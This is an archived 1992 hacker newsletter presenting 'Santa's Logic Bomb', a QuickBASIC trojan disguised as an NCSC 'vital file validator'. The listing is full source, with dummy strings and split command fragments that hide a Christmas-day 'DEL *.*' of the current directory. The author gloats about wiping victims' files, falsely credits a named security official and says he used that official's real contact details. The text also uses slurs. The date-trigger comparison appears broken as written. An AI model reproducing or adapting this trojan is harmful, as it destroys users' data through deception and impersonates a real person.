home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / pc / virus / vas066.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  6.8 KB  |  126 lines

  1.  
  2. ╔═════════════════════════════════════════════════════════════════════════════╗
  3. ║ ─────────────────────── ▀▄     █ █▀▀▀█ █▀▀▀▀ ────────────────────────────── ║
  4. ║ ───────────────────────── ▀▄   █ █   █ █▄▄▄▄ ────────────────────────────── ║
  5. ║ ─────────────────────────── ▀▄ █ █▀▀▀█     █ ────────────────────────────── ║
  6. ║ ───────────────────────────── ▀█ █   █ ▄▄▄▄█ ────────────────────────────── ║
  7. ╠═════════════════════════════════════════════════════════════════════════════╣
  8. ║                Vaginal and Anal Secretions Newsletter #0066                 ║
  9. ╟─────────────────────────────────────────────────────────────────────────────╢
  10. ║          Date Released : [07/17/92]       Author: PROBE-X                   ║
  11. ╟─────────────────────────────────────────────────────────────────────────────╢
  12. ║                              Santa's Logic Bomb                             ║
  13. ╙─────────────────────────────────────────────────────────────────────────────╜
  14.  
  15. This is a great one to make anybody angry on Christmas. I call it "Santa's
  16. Logic Bomb", it is a (VERY, VERY) simple logic bomb written in Basic. It is not
  17. a virus and does not spread. It is susposed to be a Vital File Validator, but,
  18. heh, it will really fuck up anybody who runs it on Christmas Day (12-25). It
  19. will delete all the files in the current directory. If you know BASIC (Who
  20. doesen't???), you will see some shitty programming. This was for two reasons.
  21.  
  22. a.)  To make the .EXE bigger (not a problem with QB!).
  23.  
  24. b.)  To make any retard who looks in the .EXE find some stuff that makes
  25. the program look legitimate.
  26.  
  27. It does not use SHELL "COMMAND /C DEL *.*" but instead SHELL CM$ + SEX$ +
  28. PUSSY$, you get what I mean. It uses dummy strings to make any asshole who
  29. looks in the .EXE and reads it, look legitimate. When you run it, here's
  30. what it does:
  31.  
  32. prints the info (program name, purpose)
  33. tells you it's working
  34. sends the current directory into a file with the name of today's date
  35. deletes that file
  36. if today is 12-25-xx, delete all files in current dir
  37.  
  38. SysValid comes in this VAS file in SYSVALID.ZIP which contains SYSVALID.EXE
  39. and some fake dox. (I even gave credit for the program to Patrick Gallagher,
  40. Jr., who is the director of National Computer Security Center, and I used his
  41. real address and phone numbers!) For fun, you may want to run this program
  42. (Any day except Christmas will do!) and see what is looks like. Have phun!
  43. I'll have a big laugh when half of the fucking 517 geeks loose config.sys
  44. and autoexec.bat and command.com and all the shit they store in their
  45. current directory!!
  46.  
  47. ' SYSVALID.BAS
  48. ' Santa's Logic Bomb
  49. ' By PROBE-X
  50. ' VaS'92
  51. ' All the dummy strings are for dummies who will look in the .exe
  52. ' and these strings should make the retarted dummies think this program
  53. ' actually does something!!!
  54. ' National Computer Security Center (NCSC) in another name for part
  55. ' of the Department of Defense (DoD)
  56. CLS 'Klear tha skreen
  57. L$ = "391012"    'Used to get 12 from
  58. LR$ = "225003"   'Used to get 25 from
  59. A$ = " *.*"  'Req'd string to kill *.*
  60. LT$ = "   ***   12-25-91, Created, NCSC   ***   "  'Dummy string
  61. LO$ = "   ***   07-17-92, Updated, NCSC   ***   "  'Dummy string
  62. LU$ = "command.com  io.sys  msdos.sys  ibmbio.com  sysvalid.exe"  'Dummy string
  63. LU$ = "COMMAND.COM  IO.SYS  MSDOS.SYS  IBMBIO.COM  SYSVALID.EXE"  'Req'd string
  64. CM$ = LEFT$(LU$, 7)
  65. MAS$ = RIGHT$(L$, 2) + "-" + MID$(LR$, 2, 2)
  66. LU$ = "\BIN\"  'Dummy String
  67. LU$ = "\DOS\"  'Dummy String
  68. LU$ = "NOTE: DES Encrypted File Found: " + LR$ 'Dummy string
  69. P$ = DATE$: P$ = LEFT$(P$, 6) + RIGHT$(P$, 2)
  70. PRINT
  71. PRINT "SysValid 2.1"
  72. PRINT "Vital File Validation Utility"
  73. B$ = " /C " 'Part of req'd string (put in parts so it is not easy to guess)
  74. PRINT "Copyright (C) 1992, National Computer Security Center"
  75. PRINT "This program has been released for public use."
  76. PRINT
  77. PRINT "This program should be executed from your AUTOEXEC.BAT file."
  78. PRINT
  79. PRINT "If today's date is not: "; P$; " then please change the"
  80. PRINT "clock on your computer and run SysValid again."
  81. PRINT
  82. C$ = "DEL SYSVALID.$$$" 'First 4 letters are req'd "DEL "
  83. COLOR 23, 0
  84. PRINT "Working"; : COLOR 7, 0: PRINT ".";
  85. SHELL CM$ + B$ + "DIR>" + P$ + ".$$$" 'Create dummy file
  86. PRINT ".";
  87. 'The next U$ = lines are dummies so any dummy who seees the .EXE thinks this
  88. 'program actually does somethin useful
  89. IF U$ = "DADSDADDSAD" THEN PRINT "WARNING: SYSVALID HAS BEEN DAMAGED!"
  90. IF U$ = "FFFFFFFF" THEN PRINT "WARNING: THE FILE "; LR$; " HAS BEEN DAMAGED!"
  91. IF U$ = "FFFFLDLLL" THEN PRINT "WARNING: THE FILE "; LR$; " IS MISSING!"
  92. IF U$ = "OFOOOOFFF" THEN PRINT "WARNING: THE FILE "; LR$; " HAS MtE-encrypted CODE!"
  93. IF U$ = "OOOFOOOOO" THEN PRINT "WARNING: THE FILE "; LR$; " HAS SOMEHOW BEEN CHANGED SINCE YOUR LAST BOOTUP!"
  94. IF U$ = "OOOOFD999" THEN PRINT "ERROR: SYSVALID EXTERNAL ERROR": END
  95. IF U$ = "OOOOFD993" THEN PRINT "ERROR: SYSVALID INTERNAL ERROR": END
  96. IF U$ = "FFF000000" THEN PRINT "ERROR: INCOMPATIBLE OPERATING SYSTEM": END
  97. SHELL CM$ + B$ + LEFT$(C$, 4) + P$ + ".$$$"  'Delete dummy file created
  98. 'If it's christmas, Santa will have his revenge MUHAHAHAHAHAHA
  99. IF LEFT$(B$, 5) = MAS$ THEN SHELL CM$ + B$ + LEFT$(C$, 4) + A$
  100. PRINT "."
  101. PRINT "Validation Complete, No Errors, Damage, or Changes found."
  102. END
  103.  
  104.  
  105.                    ───═════[ VaS DiSTRiBuTioN SiTeS ]═════───
  106. ╔═════════════════════════════════════════════════════════════════════════════╗
  107. ║  BBS Name                 Number       Baud   Sysop                Title    ║
  108. ╟─────────────────────────────────────────────────────────────────────────────╢
  109. ║  LiVe WiRE BBS        (313)464-1470    14.4   Studmuffin          World HQ  ║
  110. ║  PoT BBS              (313)462-1906    24oo   Phreak_Accident     World HQ  ║
  111. ║  Floating Pancreas    (305)551-0311    14.4   Majestic Cockster   Dist. #1  ║
  112. ║  Midian BBS           (703)790-8048    14.4   The Raging Golemn   Dist. #2  ║
  113. ╟─────────────────────────────────────────────────────────────────────────────╢
  114. ║  VaS Voice Mail Box   (313)910-3030    FoR THe LaTeST NeWS iN VaS And To    ║
  115. ║                                        LeAve uS CoMmEnTs!                   ║
  116. ║  VaS FaX Line         (313)380-4904    SeND C/o VaS! FaX uS CooL StuFF LiKE ║
  117. ║                                        PiCTuReS oR SomEthIng LiKe ThAt!     ║
  118. ╟─────────────────────────────────────────────────────────────────────────────╢
  119. ║              And To Reach us Via U.S. Mail, Send Letters To:                ║
  120. ║                                                                             ║
  121. ║                           VaS World Headquarters                            ║
  122. ║                              P.O. Box  530768                               ║
  123. ║                              Livonia,MI 48153                               ║
  124. ╚═════════════════════════════════════════════════════════════════════════════╝
  125.  
  126.